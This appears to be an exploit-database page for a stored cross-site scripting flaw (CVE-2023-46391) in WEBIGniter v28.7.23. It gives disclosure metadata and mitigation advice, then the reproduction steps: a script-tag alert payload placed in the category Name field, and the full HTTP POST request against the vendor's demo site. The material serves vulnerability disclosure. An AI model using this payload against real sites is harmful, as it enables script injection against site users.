header-logo
Suggest Exploit
vendor:
WEBIGniter
by:
Sagar Banwa
6.1
CVSS
HIGH
Stored Cross-site Scripting (XSS)
79
CWE
Product Name: WEBIGniter
Affected Version From: WEBIGniter v28.7.23
Affected Version To: WEBIGniter v28.7.23
Patch Exists: NO
Related CWE: CVE-2023-46391
CPE: a:webigniter:webigniter:28.7.23
Metasploit:
Other Scripts:
Platforms Tested: Windows 10, Kali Linux
2023

WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)

Stored Cross-site scripting (XSS) is a severe vulnerability where a malicious script is inserted into a vulnerable web application, leading to potential attacks on users. In this exploit for WEBIGniter v28.7.23, an attacker can inject a script by manipulating the 'Name' parameter in the 'Categories' section, allowing execution of arbitrary scripts on the victim's browser.

Mitigation:

To mitigate this vulnerability, input validation and sanitization should be implemented to ensure that user input is not executed as code. Additionally, encoding user input before displaying it can prevent script injection.
Source

Exploit-DB raw data:

# Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)
# Exploit Author: Sagar Banwa
# Date: 19/10/2023
# Vendor: https://webigniter.net/
# Software: https://webigniter.net/demo
# Reference: https://portswigger.net/web-security/cross-site-scripting
# Tested on: Windows 10/Kali Linux
# CVE : CVE-2023-46391


Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Steps-To-Reproduce:

1. Login to the Account 
2. Go to the Categories.
3. Now add catagory > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.php


Request 

POST /cms/categories/add HTTP/2
Host: demo.webigniter.net
Cookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: https://demo.webigniter.net
Referer: https://demo.webigniter.net/cms/categories/add
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php

Navigation

Suggest Exploit

Services By CQR